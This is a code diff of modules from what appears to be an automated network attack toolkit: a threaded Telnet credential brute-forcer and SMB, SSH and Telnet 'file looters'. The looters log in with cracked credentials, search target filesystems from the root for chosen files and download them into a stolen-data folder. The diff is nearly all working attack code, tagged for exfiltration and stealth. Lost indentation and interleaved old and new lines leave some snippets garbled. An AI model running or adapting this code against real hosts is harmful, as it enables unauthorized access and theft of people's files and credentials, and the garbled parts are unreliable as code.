                                if self.stop_execution or self.shared_data.orchestrator_should_exit:
                                    logger.info("Execution interrupted.")
                                    break
                                self.steal_file(conn, s.name, remote, base)
                            logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
                            success = True
                    try:
                        conn.close()
                    except Exception:
                        pass
            except Exception as e:
                logger.info(f"Anonymous SMB failed on {ip}: {e}")

            # Per-share credentials
            for share, creds in creds_by_share.items():
                if share in self.IGNORED_SHARES:
                    continue
                for username, password in creds:
                    if self.stop_execution or self.shared_data.orchestrator_should_exit:
                        logger.info("Execution interrupted.")
                        break
                    try:
                        conn = self.connect_smb(ip, username, password)
                        if not conn:
                            continue
                        files = self.find_files(conn, share, '/')
                        if files:
                            base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
                            for remote in files:
                                if self.stop_execution or self.shared_data.orchestrator_should_exit:
                                    logger.info("Execution interrupted.")
                                    break
                                self.steal_file(conn, share, remote, base)
                            logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
                            success = True
                        try:
                            conn.close()
                        except Exception:
                            pass
                    except Exception as e:
                        logger.error(f"SMB loot error {ip} {share} {username}: {e}")

            timer.cancel()
            return 'success' if success else 'failed'
        except Exception as e:
            logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
            return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,173 +1,330 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_ssh.py — SSH file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
import os
import time
import logging
import paramiko
from threading import Timer
from typing import List, Tuple, Dict, Optional

from shared import SharedData
from logger import Logger
# Logger for this module
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
b_class = "StealFilesSSH" # Unique action identifier
b_module = "steal_files_ssh" # Python module name (this file without .py)
b_status = "steal_files_ssh" # Human/readable status key (free form)
b_action = "normal" # 'normal' (per-host) or 'global'
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
b_port = 22 # Preferred target port (used if present on host)
# Trigger strategy:
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
# - Also allow starting when the host exposes SSH (on_service:ssh),
# but the requirements below still enforce that SSH creds must be present.
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
# Requirements (JSON string):
# - must have SSH credentials on this MAC
# - must have port 22 (legacy fallback if port_services is missing)
# - limit concurrent running actions system-wide to 2 for safety
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
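# Illustrative note (assumption — the actual evaluation happens in the scheduler, not in this module):
# json.loads(b_requires) yields {"all": [{"has_cred": "ssh"}, {"has_port": 22}, {"max_concurrent": 2}]},
# i.e. every clause under "all" must hold before this action is queued for a host.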
# Scheduling / limits
b_priority = 70 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
class StealFilesSSH:
    """StealFilesSSH: connects via SSH using known creds and downloads matching files."""
def __init__(self, shared_data: SharedData):
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
self.shared_data = shared_data
self.sftp_connected = False # flipped to True on first SFTP open
self.stop_execution = False # global kill switch (timer / orchestrator exit)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSSH initialized")
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
"""Return MAC for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
"""Return current hostname for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Credentials (creds table) ---------------------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Fetch SSH creds for this target from DB.creds.
Strategy:
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
- Also include rows for same MAC (if known), still service='ssh'.
Returns list of (username, password), deduplicated.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
# Pull by IP
by_ip = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(ip,'') = :ip
AND (port IS NULL OR port = :port)
""",
params
)
# Pull by MAC (if we have one)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(mac_address,'') = :mac
AND (port IS NULL OR port = :port)
""",
params
)
# Deduplicate while preserving order
seen = set()
out: List[Tuple[str, str]] = []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# --------------------- SSH helpers ---------------------
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
"""
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
NOTE: Paramiko logs are silenced at module import level.
"""
        try:
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            # Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
            ssh.connect(
                hostname=ip,
                username=username,
                password=password,
                port=port,
                timeout=timeout,
                auth_timeout=timeout,
                banner_timeout=timeout,
                allow_agent=False,
                look_for_keys=False,
            )
            logger.info(f"Connected to {ip} via SSH as {username}")
            return ssh
        except Exception as e:
            logger.error(f"Error connecting to SSH on {ip} as {username}: {e}")
            raise
    def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
        """
        List candidate files from remote dir, filtered by config:
          - shared_data.steal_file_extensions (endswith)
          - shared_data.steal_file_names (substring match)
        Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
        """
        try:
            # Quiet 'permission denied' messages via redirection
            cmd = f'find {dir_path} -type f 2>/dev/null'
            stdin, stdout, stderr = ssh.exec_command(cmd)
            files = (stdout.read().decode(errors="ignore") or "").splitlines()

            exts = set(self.shared_data.steal_file_extensions or [])
            names = set(self.shared_data.steal_file_names or [])
            if not exts and not names:
                # If no filters are defined, do nothing (too risky to pull everything).
                logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
                return []

            matches: List[str] = []
            for fpath in files:
                if self.shared_data.orchestrator_should_exit or self.stop_execution:
                    logger.info("File search interrupted.")
                    return []
                fname = os.path.basename(fpath)
                if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
                    matches.append(fpath)

            logger.info(f"Found {len(matches)} matching files in {dir_path}")
            return matches
        except Exception as e:
            logger.error(f"Error finding files in directory {dir_path}: {e}")
            raise

    def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
        """
        Download a single remote file into the given local dir, preserving subdirs.
        """
        try:
            sftp = ssh.open_sftp()
            self.sftp_connected = True  # first time we open SFTP, mark as connected
            # Preserve partial directory structure under local_dir
            remote_dir = os.path.dirname(remote_file)
            local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
            os.makedirs(local_file_dir, exist_ok=True)
            local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
            sftp.get(remote_file, local_file_path)
            logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
            sftp.close()
        except Exception as e:
            logger.error(f"Error stealing file {remote_file}: {e}")
            raise

    # --------------------- Orchestrator entrypoint ---------------------
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        """
        Orchestrator entrypoint (signature preserved):
          - ip: target IP
          - port: str (expected '22')
          - row: current target row (compat structure built by shared_data)
          - status_key: action name (b_class)
        Returns 'success' if at least one file stolen; else 'failed'.
        """
        try:
            logger.info(f"Stealing files from {ip}:{port}...")
            self.shared_data.bjorn_orch_status = b_class

            # Gather credentials from DB
            try:
                port_i = int(port)
            except Exception:
                port_i = b_port

            creds = self._get_creds_for_target(ip, port_i)
            logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
            if not creds:
                logger.error(f"No SSH credentials for {ip}. Skipping.")
                return 'failed'

            # Define a timer: if we never establish SFTP in 4 minutes, abort
            def _timeout():
                if not self.sftp_connected:
                    logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
                    self.stop_execution = True

            timer = Timer(240, _timeout)
            timer.start()

            # Identify where to save loot
            mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
            base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")

            # Try each credential until success (or interrupted)
            success_any = False
            for username, password in creds:
                if self.stop_execution or self.shared_data.orchestrator_should_exit:
                    logger.info("Execution interrupted.")
                    break
                try:
                    ssh = self.connect_ssh(ip, username, password, port=port_i)
                    # Search from root; filtered by config
                    files = self.find_files(ssh, '/')
                    if files:
                        for remote in files:
                            if self.stop_execution or self.shared_data.orchestrator_should_exit:
                                logger.info("Execution interrupted during download.")
                                break
                            self.steal_file(ssh, remote, base_dir)
                        logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
                        success_any = True
                    try:
                        ssh.close()
                    except Exception:
                        pass
                    if success_any:
                        break  # one successful cred is enough
                except Exception as e:
                    # Stay quiet on Paramiko internals; just log the reason and try next cred
                    logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")

            timer.cancel()
            return 'success' if success_any else 'failed'
        except Exception as e:
            logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
            return 'failed'
if __name__ == "__main__":
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
    try:
        sd = SharedData()
        action = StealFilesSSH(sd)
        # Example (replace with a real IP that has creds in DB):
        # result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
        # print("Result:", result)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,180 +1,218 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_telnet.py — Telnet file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
- Credentials read from DB.creds (service='telnet'); we try each pair.
- Files found via 'find / -type f', then retrieved with 'cat'.
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
    def __init__(self, shared_data: SharedData):
        self.shared_data = shared_data
        self.telnet_connected = False
        self.stop_execution = False
        self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
        self._refresh_ip_identity_cache()
        logger.info("StealFilesTelnet initialized")
    # -------- Identity cache --------
    def _refresh_ip_identity_cache(self) -> None:
        self._ip_to_identity.clear()
        try:
            rows = self.shared_data.db.get_all_hosts()
        except Exception as e:
            logger.error(f"DB get_all_hosts failed: {e}")
            rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- Telnet helpers --------
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
try:
tn = telnetlib.Telnet(ip, b_port, timeout=10)
tn.read_until(b"login: ", timeout=5)
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
# prompt detection (naïf mais identique à l'original)
time.sleep(2)
self.telnet_connected = True
logger.info(f"Connected to {ip} via Telnet as {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
logger.error(f"Telnet connect error {ip} {username}: {e}")
return None
    def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
        try:
            if self.shared_data.orchestrator_should_exit or self.stop_execution:
                logger.info("File search interrupted.")
                return []
            tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
            out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
            files = out.splitlines()
            matches = []
            for f in files:
                if self.shared_data.orchestrator_should_exit or self.stop_execution:
                    logger.info("File search interrupted.")
                    return []
                fname = os.path.basename(f.strip())
                if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
                   (self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
                    matches.append(f.strip())
            logger.info(f"Found {len(matches)} matching files under {dir_path}")
            return matches
        except Exception as e:
            logger.error(f"Telnet find error: {e}")
            return []
    def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
        try:
            if self.shared_data.orchestrator_should_exit or self.stop_execution:
                logger.info("Steal interrupted.")
                return
            local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
            os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
            with open(local_file_path, 'wb') as f:
                tn.write(f'cat {remote_file}\n'.encode('ascii'))
                f.write(tn.read_until(b"$", timeout=10))
            logger.success(f"Downloaded {remote_file} -> {local_file_path}")
        except Exception as e:
            logger.error(f"Telnet download error {remote_file}: {e}")
    # -------- Orchestrator entry --------
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        try:
            self.shared_data.bjorn_orch_status = b_class
            logger.info(f"Stealing files from {ip}:{port}...")
            try:
                port_i = int(port)
            except Exception:
                port_i = b_port

            creds = self._get_creds_for_target(ip, port_i)
            logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
            if not creds:
                logger.error(f"No Telnet credentials for {ip}. Skipping.")
                return 'failed'

            def _timeout():
                if not self.telnet_connected:
                    logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
                    self.stop_execution = True

            timer = Timer(240, _timeout)
            timer.start()

            mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
            base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
            success = False

            for username, password in creds:
                if self.stop_execution or self.shared_data.orchestrator_should_exit:
                    logger.info("Execution interrupted.")
                    break
                try:
                    tn = self.connect_telnet(ip, username, password)
                    if not tn:
                        continue
                    files = self.find_files(tn, '/')
                    if files:
                        for remote in files:
                            if self.stop_execution or self.shared_data.orchestrator_should_exit:
                                logger.info("Execution interrupted.")
                                break
                            self.steal_file(tn, remote, base_dir)
                        logger.success(f"Stole {len(files)} files from {ip} as {username}")
                        success = True
                    try:
                        tn.close()
                    except Exception:
                        pass
                    if success:
                        timer.cancel()
                        return 'success'
                except Exception as e:
                    logger.error(f"Telnet loot error {ip} {username}: {e}")

            timer.cancel()
            return 'success' if success else 'failed'
        except Exception as e:
            logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
            return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -0,0 +1,272 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique dorigine (telnetlib, queue/threads)
"""
import os
import telnetlib
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
b_class = "TelnetBruteforce"
b_module = "telnet_bruteforce"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800          # 30 minutes between two runs
b_rate_limit = '3/86400'   # at most 3 runs per day
class TelnetBruteforce:
"""Wrapper orchestrateur -> TelnetConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_bruteforce = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""Lance le bruteforce Telnet pour (ip, port)."""
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
        # Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
    # ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
    # ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
try:
tn.close()
except Exception:
pass
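            # telnetlib's expect() returns (match_index, match_object, bytes_read);
            # indexes 2 and 3 map to the "$ " / "# " prompts, i.e. a shell was reached.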
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('telnet',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='telnet'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for Telnet bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
time.sleep(self.shared_data.timewait_telnet)
def run_bruteforce(self, adresse_ip: str, port: int):
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results
    # ---------- DB persistence ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="telnet",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
telnet_bruteforce = TelnetBruteforce(sd)
logger.info("Telnet brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
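The INSERT/UPDATE statements above assume a `creds` table whose DDL is not in this diff. A throwaway sketch of a schema consistent with the columns referenced here and in the steal_files actions (purely an assumption; the real schema lives in the database layer):

import sqlite3

ASSUMED_CREDS_DDL = """
CREATE TABLE IF NOT EXISTS creds (
    id          INTEGER PRIMARY KEY AUTOINCREMENT,
    service     TEXT NOT NULL,
    mac_address TEXT,
    ip          TEXT,
    hostname    TEXT,
    "user"      TEXT,
    "password"  TEXT,
    port        INTEGER,
    "database"  TEXT,
    extra       TEXT,
    last_seen   TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
"""

# Quick in-memory check that the module's insert statement parses against this sketch
con = sqlite3.connect(":memory:")
con.executescript(ASSUMED_CREDS_DDL)
con.execute(
    'INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra) '
    "VALUES('telnet',?,?,?,?,?,?,?,NULL)",
    ("AA:BB:CC:DD:EE:FF", "192.168.1.20", "printer", "admin", "admin", 23, ""),
)
print(con.execute('SELECT service, ip, "user" FROM creds').fetchall())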

View File

@@ -1,206 +0,0 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
